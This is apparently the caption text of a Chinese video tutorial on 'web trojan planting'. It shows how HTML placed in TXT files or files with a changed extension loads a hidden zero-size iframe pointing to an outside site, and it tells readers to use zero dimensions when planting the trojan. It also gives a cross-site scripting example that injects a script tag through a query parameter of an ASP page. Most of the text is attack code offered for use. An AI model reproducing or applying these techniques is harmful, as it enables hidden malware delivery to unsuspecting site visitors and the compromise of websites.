动画介绍:主题:另类网页挂马思路 我是棒棒 QQ:405799855 QQ群: 29182422(已满) 23849177 OK. Let’s start!
原理很简单,其实在TXT里写入HTM代码同样可以访问网站,呵呵! 可能老鸟们早就知道了!
代码1:(图片) <html> <img src=http://www.lf328.com/skin/1/0124.jpg> <iframe src="http://www.baidu.com/" width="0" height="0" frameborder="0"></iframe> </html>
OK,我们来打开看看 可能速度太快大家没看到,我来调整下长宽 看到了吧? 呵呵 我是为了方便大家观看才把长宽设置成500,大家挂马给设置成0,0
代码2:(文字) OK,测试成功 <html> <iframe src="http://www.****.com/" width="0" height="0" frameborder="0"></iframe> </html>
变化后缀同样可以访问exe,jpg,gif,rar
其实这跟啊拉收信的asp跨站攻击一个道理 dqhx.asp?num=<script>window.open("http://www.baidu.com/");</script> 这句话代码意思就是把<script>window.open("http://www.baidu.com/");</script>写入收信的TXT |